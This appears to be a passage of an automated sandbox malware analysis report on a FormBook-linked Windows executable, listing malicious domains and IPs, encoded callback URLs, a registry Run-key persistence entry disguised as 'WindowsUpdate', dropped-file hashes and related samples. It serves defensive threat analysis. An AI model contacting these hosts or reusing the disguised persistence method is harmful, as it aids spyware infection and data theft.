            http://www.ontohealth.net/xqh1/?SBV8T=1lJpZfbXA4K&8RN4oRq=LdMJVAe8LjCJtA/hX/WGJbv1EGS8xWceFJt7j7SiEDgChmEUBLc4idOyKCr8dFmuKAy1MvAxa+k6cqr1XzKglkByqns40V6cXeBQfaQQ1061cjyky34X3yYouoYD43fZweF+tEU= | 0% | Avira URL Cloud | safe
            https://www.hover.com/transfer_in?source=parked | 0% | Avira URL Cloud | safe
            https://www.hover.com/domain_pricing?source=parked | 0% | Avira URL Cloud | safe
            http://www.c6ytv.net/3tnk/ | 0% | Avira URL Cloud | safe
            https://www.hover.com/domains/results | 0% | Avira URL Cloud | safe
            https://www.hover.com/tos?source=parked | 0% | Avira URL Cloud | safe
            https://www.hover.com/tools?source=parked | 0% | Avira URL Cloud | safe
            http://www.sadey.info/f8et/ | 0% | Avira URL Cloud | safe
            http://www.sadey.info/f8et/?SBV8T=1lJpZfbXA4K&8RN4oRq=Xc+PdMClmL/WIO2isq0x5LlJuoJRDXdLpdKh2o4ZOQaHQca6wh6b+iZ++523jXtiu5eeO8fPpGm95hdP5yrPQZ/IU8CBx+hGfkwf4+1MD46FKwSALgSHTW1ViZ9EzcIAYloemhI= | 0% | Avira URL Cloud | safe
            http://www.integritywork.shop/r0a9/?8RN4oRq=ZYHb+yN+RN7ZtjbwI7SB23xqPJJsxDr8Rawhra04/gYnM82mZx5+8Ykp6tR7PNEw3bB584nn/0BLo1rj87ovLgV9i3rHjjPoDRBTQtWr7711poFsTmp7tSOMnBMqrIuiMn54qIs=&SBV8T=1lJpZfbXA4K | 0% | Avira URL Cloud | safe
            http://www.ontohealth.net/xqh1/ | 0% | Avira URL Cloud | safe
            http://www.sadey.info | 0% | Avira URL Cloud | safe
            https://help.hover.com/home?source=parked | 0% | Avira URL Cloud | safe
            https://www.hover.com/?source=parked | 0% | Avira URL Cloud | safe
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            www.integritywork.shop | 216.40.34.41 | true | true | | unknown
            x105.jieruitech.info | 192.197.113.67 | true | true | | unknown
            www.sadey.info | 162.0.225.218 | true | true | | unknown
            ontohealth.net | 3.33.130.190 | true | true | | unknown
            www.ontohealth.net | unknown | unknown | true | | unknown
            www.uphc255.vip | unknown | unknown | true | | unknown
            www.c6ytv.net | unknown | unknown | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            http://www.ontohealth.net/xqh1/?SBV8T=1lJpZfbXA4K&8RN4oRq=LdMJVAe8LjCJtA/hX/WGJbv1EGS8xWceFJt7j7SiEDgChmEUBLc4idOyKCr8dFmuKAy1MvAxa+k6cqr1XzKglkByqns40V6cXeBQfaQQ1061cjyky34X3yYouoYD43fZweF+tEU= | true | Avira URL Cloud: safe | unknown
            http://www.c6ytv.net/3tnk/?8RN4oRq=CW2JkxV3pcekLoIorT56ryscgS11ntIpF5Aeg7ZfnKRiExYc+D8BbmUzHwDhufn4r4Dro/61FctGFi0noZVWC4EErF1Fy7sjRinEodY+GdyVC1Z8TkDJNhe4fZdCuwZwItNyPB0=&SBV8T=1lJpZfbXA4K | true | Avira URL Cloud: safe | unknown
            http://www.c6ytv.net/3tnk/ | true | Avira URL Cloud: safe | unknown
            http://www.integritywork.shop/r0a9/?8RN4oRq=ZYHb+yN+RN7ZtjbwI7SB23xqPJJsxDr8Rawhra04/gYnM82mZx5+8Ykp6tR7PNEw3bB584nn/0BLo1rj87ovLgV9i3rHjjPoDRBTQtWr7711poFsTmp7tSOMnBMqrIuiMn54qIs=&SBV8T=1lJpZfbXA4K | true | Avira URL Cloud: safe | unknown
            http://www.sadey.info/f8et/?SBV8T=1lJpZfbXA4K&8RN4oRq=Xc+PdMClmL/WIO2isq0x5LlJuoJRDXdLpdKh2o4ZOQaHQca6wh6b+iZ++523jXtiu5eeO8fPpGm95hdP5yrPQZ/IU8CBx+hGfkwf4+1MD46FKwSALgSHTW1ViZ9EzcIAYloemhI= | true | Avira URL Cloud: safe | unknown
            http://www.sadey.info/f8et/ | true | Avira URL Cloud: safe | unknown
            http://www.ontohealth.net/xqh1/ | true | Avira URL Cloud: safe | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://www.hover.com/domain_pricing?source=parked | EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.hover.com/privacy?source=parked | EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.autoitscript.com/autoit3/J | FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000000.2258645214.0000000000E35000.00000002.00000001.01000000.0000000A.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | false | | high
            https://duckduckgo.com/chrome_newtab | EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://twitter.com/hover | EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | false | | high
            https://duckduckgo.com/ac/?q= | EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://www.instagram.com/hover_domains | EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | false | | high
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://www.hover.com/transfer_in?source=parked | EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.hover.com/renew?source=parked | EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://www.autoitscript.com/autoit3/ | FS04dlvJrq.exe, 00000000.00000003.2148241158.000000000706D000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm, 00000008.00000003.2286539137.0000000001969000.00000004.00000020.00020000.00000000.sdmp, bpqdpksed.icm.8.dr, bpqdpksed.icm.exe.8.dr, bpqdpksed.icm.exe0.8.dr, bpqdpksed.icm.0.dr | false | | high
            https://www.ecosia.org/newtab/ | EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://www.hover.com/email?source=parked | EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.hover.com/about?source=parked | EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://ac.ecosia.org/autocomplete?q= | EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://www.hover.com/domains/results | EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.hover.com/tos?source=parked | EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | EhStorAuthn.exe, 00000016.00000003.2889768817.0000000007688000.00000004.00000020.00020000.00000000.sdmp | false | | high
            https://www.hover.com/tools?source=parked | EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://help.hover.com/home?source=parked | EhStorAuthn.exe, 00000016.00000002.3360010418.0000000005146000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000016.00000002.3361486892.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, rmfPfCOHcNt.exe, 00000017.00000002.3358040250.0000000002E56000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            http://www.sadey.info | rmfPfCOHcNt.exe, 00000017.00000002.3359416956.0000000004D78000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            https://www.hover.com/?source=parked | firefox.exe, 00000018.00000002.2994416483.000000001A236000.00000004.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
            IP | Domain | Country | ASN | ASN Name | Malicious
            192.197.113.67 | x105.jieruitech.info | China | 133115 | HKKFGL-AS-APHKKwaifongGroupLimitedHK | true
            3.33.130.190 | ontohealth.net | United States | 8987 | AMAZONEXPANSIONGB | true
            162.0.225.218 | www.sadey.info | Canada | 22612 | NAMECHEAP-NETUS | true
            216.40.34.41 | www.integritywork.shop | Canada | 15348 | TUCOWSCA | true
            Joe Sandbox version: 41.0.0 Charoite
            Analysis ID: 1550252
            Start date and time: 2024-11-06 16:05:00 +01:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 10m 5s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of new started processes analysed: 23
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 2
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Sample name: FS04dlvJrq.exe (renamed because original name is a hash value)
            Original Sample Name: 16b2851cd765c313395a3cba2a38a16d4338ef32bb68e5c13320494b3c84c52a.exe
            Detection: MAL
            Classification: mal100.troj.spyw.evad.winEXE@27/54@6/4
            EGA Information:
            • Successful, ratio: 80%
            HCA Information:
                                                    • Successful, ratio: 94%
                                                    • Number of executed functions: 180
                                                    • Number of non-executed functions: 219
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                    • VT rate limit hit for: FS04dlvJrq.exe
Time | Type | Description
10:06:07 | API Interceptor | 1x Sleep call for process: FS04dlvJrq.exe modified
10:07:20 | API Interceptor | 220053x Sleep call for process: EhStorAuthn.exe modified
16:06:13 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run WindowsUpdate C:\Users\user\AppData\Roaming\uhex\BPQDPK~1.EXE C:\Users\user\AppData\Roaming\uhex\vbepwhj.mp3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3.33.130.190 | XhAQ0Rk63O.exe | malicious | FormBook | www.marketprediction.app/ucmb/
  | BkZqIS5vlv.exe | malicious | FormBook | www.6686vi38.app/2jrh/
  | 2rI5YEg7uo.exe | malicious | FormBook | www.bidiez.com/01ng/?pP=DKK6a8PuthPc5ErrRrUbqhrmbP0bjeSkTcQU4x169SXHcyb2o6vFTIaCYUtclW/lDJA6K99MZF0w0Rv4V8fYsQ/Owb2oIOoLiZkxZhnBqViSzSDNrw==&UJO=A6MH4FUp
  | padvVY1AW1.exe | malicious | FormBook | www.theclydefund.info/iqn9/
  | FzmC0FwV6y.exe | malicious | FormBook | www.mycompensation.xyz/2wn6/
  | INVOICE_PO# PUO202300054520249400661.exe | malicious | FormBook | www.robotcurut.xyz/37zt/
  | Shipping documents..exe | malicious | FormBook | www.econsultoria.online/azb9/
  | icRicpJWczmiOf8.exe | malicious | FormBook | www.mythkitchen.net/jpec/
  | PO_11000262.vbs | malicious | FormBook | www.ortenckt.online/5w7h/
  | SecuriteInfo.com.FileRepMalware.20173.21714.exe | malicious | FormBook | www.yourwebbuzz.net/84o5/
162.0.225.218 | FzmC0FwV6y.exe | malicious | FormBook | www.helobu.online/dmn4/
  | Quote_General_Tech_LLC_637673,PDF.exe | malicious | FormBook | www.junkwe.online/pvpq/
  | New Order list attached.exe | malicious | DBatLoader, FormBook | www.gufied.store/ercr/
  | PO 45003516.exe | malicious | FormBook | www.inclo.xyz/usq9/
  | 890927362736.exe | malicious | DBatLoader, FormBook | www.gufied.store/ercr/
  | COMMERCIAL INVOICES.exe | malicious | FormBook | www.supox.site/ksch/
  | orA5ALUAmWVn51g.exe | malicious | FormBook | www.sadey.info/fe61/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.sadey.info | orA5ALUAmWVn51g.exe | malicious | FormBook | 162.0.225.218
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TUCOWSCA | SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exe | malicious | FormBook | 216.40.34.41
  | A4mmSHCUi2.exe | malicious | FormBook | 216.40.34.41
  | LlbpXphTu9.exe | malicious | Unknown | 216.40.34.41
  | zamowienie.exe | malicious | GuLoader | 216.40.34.41
  | 10145202485.vbs | malicious | GuLoader | 216.40.34.41
  | file.exe | malicious | Unknown | 64.99.192.91
  | firmware.armv7l.elf | malicious | Unknown | 216.40.34.37
  | firmware.i586.elf | malicious | Unknown | 216.40.34.37
  | firmware.i686.elf | malicious | Unknown | 216.40.34.37
  | UnmxRI.exe | malicious | FormBook, PureLog Stealer | 216.40.34.41
AMAZONEXPANSIONGB | XhAQ0Rk63O.exe | malicious | FormBook | 3.33.130.190
  | BkZqIS5vlv.exe | malicious | FormBook | 3.33.130.190
  | 2rI5YEg7uo.exe | malicious | FormBook | 3.33.130.190
  | padvVY1AW1.exe | malicious | FormBook | 3.33.130.190
  | FzmC0FwV6y.exe | malicious | FormBook | 3.33.130.190
  | INVOICE_PO# PUO202300054520249400661.exe | malicious | FormBook | 3.33.130.190
  | ENQUIRY LED LIGHTS.pif.exe | malicious | FormBook | 3.33.130.190
  | https://rebrand.ly/32mqjh6 | malicious | HTMLPhisher | 3.33.143.57
  | Shipping documents..exe | malicious | FormBook | 3.33.130.190
  | icRicpJWczmiOf8.exe | malicious | FormBook | 3.33.130.190
NAMECHEAP-NETUS | padvVY1AW1.exe | malicious | FormBook | 199.192.21.169
  | FzmC0FwV6y.exe | malicious | FormBook | 162.0.225.218
  | ENQUIRY LED LIGHTS.pif.exe | malicious | FormBook | 162.0.231.203
  | IbRV4I7MrS.exe | malicious | FormBook | 162.0.231.203
  | 56ck70s0BI.exe | malicious | FormBook | 68.65.122.222
  | p4rsJEIb7k.exe | malicious | FormBook | 68.65.122.222
  | wODub61gZe.exe | malicious | FormBook | 162.213.249.216
  | ffsBbRe8UN.exe | malicious | FormBook | 162.0.238.238
  | b9Mm2hq1pU.exe | malicious | AgentTesla, PureLog Stealer | 198.54.122.135
  | SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exe | malicious | FormBook | 192.64.118.221
HKKFGL-AS-APHKKwaifongGroupLimitedHK | botnet.mips.elf | malicious | Mirai, Moobot | 154.221.28.71
  | mips.elf | malicious | Mirai | 154.221.30.1
  | sh4.elf | malicious | Mirai | 154.221.30.6
  | http://telegiraum.club/ | malicious | Telegram Phisher | 156.236.70.154
  | http://telegiraum.club/ | malicious | Telegram Phisher | 156.236.70.154
  | na.elf | malicious | Mirai | 194.120.230.54
  | na.elf | malicious | Mirai | 194.120.230.54
  | na.elf | malicious | Unknown | 194.120.230.54
  | r3M3VGE5AG.elf | malicious | Unknown | 194.120.230.54
  | na.elf | malicious | Gafgyt | 103.218.208.171
                                                    No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm.exe | M1Y6kc9FpE.exe | malicious | FormBook
  | mJIvCBk5vF.exe | malicious | FormBook
  | lcbF0sywlU.exe | malicious | FormBook
  | 1aG5DoOsAW.exe | malicious | FormBook
  | Factura-2410-CFDI.bat | malicious | Unknown
  | DGFmCcZnM0.exe | malicious | FormBook
  | qZkywW6Q0b.exe | malicious | FormBook
  | AlBXxWizEX.msi | malicious | DanaBot
  | mEudzoO1bG.exe | malicious | FormBook
  | HoGsuqrMLl.exe | malicious | FormBook
C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm | M1Y6kc9FpE.exe | malicious | FormBook
  | mJIvCBk5vF.exe | malicious | FormBook
  | lcbF0sywlU.exe | malicious | FormBook
  | 1aG5DoOsAW.exe | malicious | FormBook
  | Factura-2410-CFDI.bat | malicious | Unknown
  | DGFmCcZnM0.exe | malicious | FormBook
  | qZkywW6Q0b.exe | malicious | FormBook
  | AlBXxWizEX.msi | malicious | DanaBot
  | mEudzoO1bG.exe | malicious | FormBook
  | HoGsuqrMLl.exe | malicious | FormBook
                                                                                            Process:C:\Windows\SysWOW64\EhStorAuthn.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                            Category:dropped
                                                                                            Size (bytes):196608
                                                                                            Entropy (8bit):1.1239949490932863
                                                                                            Encrypted:false
                                                                                            SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                            MD5:271D5F995996735B01672CF227C81C17
                                                                                            SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                            SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                            SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                            Malicious:false
                                                                                            Process:C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):947288
                                                                                            Entropy (8bit):6.629681466265794
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: M1Y6kc9FpE.exe, Detection: malicious
• Filename: mJIvCBk5vF.exe, Detection: malicious
• Filename: lcbF0sywlU.exe, Detection: malicious
• Filename: 1aG5DoOsAW.exe, Detection: malicious
• Filename: Factura-2410-CFDI.bat, Detection: malicious
• Filename: DGFmCcZnM0.exe, Detection: malicious
• Filename: qZkywW6Q0b.exe, Detection: malicious
• Filename: AlBXxWizEX.msi, Detection: malicious
• Filename: mEudzoO1bG.exe, Detection: malicious
• Filename: HoGsuqrMLl.exe, Detection: malicious
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L...).(c.........."...............................@..................................L....@...@.......@.........................|....P..P............N..X&...0..Pv...........................C..........@............................................text...|........................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...P....P......................@..@.reloc..Pv...0...x..................@..B................................................................................................................................................................................................................................................................................
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):947288
                                                                                            Entropy (8bit):6.629681466265794
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:fYgAon+KfqNbXD2XJ2PH1ddATgs/u2kaCB+l:f37+KSbq5e1diEnHaCK
                                                                                            MD5:0ADB9B817F1DF7807576C2D7068DD931
                                                                                            SHA1:4A1B94A9A5113106F40CD8EA724703734D15F118
                                                                                            SHA-256:98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                                                                                            SHA-512:883AA88F2DBA4214BB534FBDAF69712127357A3D0F5666667525DB3C1FA351598F067068DFC9E7C7A45FED4248D7DCA729BA4F75764341E47048429F9CA8846A
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: M1Y6kc9FpE.exe, Detection: malicious
• Filename: mJIvCBk5vF.exe, Detection: malicious
• Filename: lcbF0sywlU.exe, Detection: malicious
• Filename: 1aG5DoOsAW.exe, Detection: malicious
• Filename: Factura-2410-CFDI.bat, Detection: malicious
• Filename: DGFmCcZnM0.exe, Detection: malicious
• Filename: qZkywW6Q0b.exe, Detection: malicious
• Filename: AlBXxWizEX.msi, Detection: malicious
• Filename: mEudzoO1bG.exe, Detection: malicious
• Filename: HoGsuqrMLl.exe, Detection: malicious
                                                                                            Process:C:\Users\user\Desktop\FS04dlvJrq.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):581
                                                                                            Entropy (8bit):5.546344133050769
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:C1n/QXD8BPj1O6VIi/KFgy1U4Xkkc4Le4mHv/I0:C1n/A8l1pgH1U4X5nVWI0
                                                                                            MD5:D4FDDB7B95EF320260853D7EE5054AD6
                                                                                            SHA1:933D6B276C32F17204B3A313823B21AFAB6842AE
                                                                                            SHA-256:82367D1FDC82F802F695E38C00D5E644D31FD949EF2FE327A0AEFC1199C67712
                                                                                            SHA-512:BB62A3F48C9D47A69B525A0E067B60AA3BC4B6DF4DD6BA3C7C0E8851E142B4210CD8213122164FE81A13D8EB7A6B75CC9C6B7E63375C2C3C0E3B3C93BF7E06EE
                                                                                            Malicious:false
                                                                                            Preview:8j88PMn13k9C73521a9W2II0r4xX52mlQcJy26e87tT08Ap98742M9o5X8G85Tdg960J6r0y0WHtR518Lj7..ColorConstants TreeViewConstants..G2947PBFqf6j6M7G6Pocsj100aS6S99V562XKh6dLu17u6852vuMQTIVQ69FA80j7aP86u120qKG94n..ToolTipConstants ComboConstants..qh8eF160D185L400U7Ct36UY5i8U7121Osv375rO7yR9YofX85rPj1H5968OK04610jtVFr60no1321A0j7ctPMkB766..ColorConstants BorderConstants..j7Y74m2532509Za26s0Rcr34V9LI8w99Yb77559022f2Um0vNLG93TLSaRv304pi9RfRkuZqg1222u4p6Qb79l4Hy1..UpDownConstants ColorConstants..Be54946v9X8ESc3P358Dhc6Z377523px1D63f9923RPoE9uR7e9249D3K9sF..StructureConstants BorderConstants..

Process:C:\Users\user\Desktop\FS04dlvJrq.exe
File Type:ASCII text, with very long lines (65536), with no line terminators
Category:dropped
Size (bytes):567839
Entropy (8bit):4.048600444460266
Encrypted:false
SSDEEP:6144:K852spk1uP3qTW0l5s9qLIZWCOoDNAGERKEo4AaDYur1aL52/WFO:znaE6Ffs9PoCOTGZO15aLoOA
MD5:70C94472C2B94B631D476EE09724D49D
SHA1:7038CBC08B91B66D8E180FD9B4653FBB01097972
SHA-256:A27623E45A527D89A07D3B0A1B32CC510A77BFDBDED6EE9BEA24C0D8CCC8D64E
SHA-512:4AA84EE61631EFEE0967F572F53BE8BFF84DA20A6C86220FC5B6CF5DDFB12EDAF958403315B0AE008E2335533FBB5A5BE296292C908E444BDC49145B632E629A
Malicious:false

Process:C:\Users\user\Desktop\FS04dlvJrq.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):31214
Entropy (8bit):5.571170220741757
Encrypted:false
SSDEEP:768:RJWZXrOy88UE/douU4zvmsJAmYxHxejMJ8vlU:21f88UbnDsJ2SjpC
MD5:6B58B68859E25C88D3235AADEA10A15F
SHA1:6FF08E2010F8A6D635FA6E365FAB0098B68F470B
SHA-256:BBEF0EF89BFA3A3BAE0452A71B64BB46B217F7CCACB2CD79FB466C13B6BA4631
SHA-512:6B2B24AF543CFF19ACC37261C3DE00459D8BD66720A9D3E48265DEF903E87CBDD8F7415D09070FAB3C2345C0BC3769A13F156E7EAC4CF2FF4AEDC15A6EB488C6
Malicious:false

Process:C:\Users\user\Desktop\FS04dlvJrq.exe
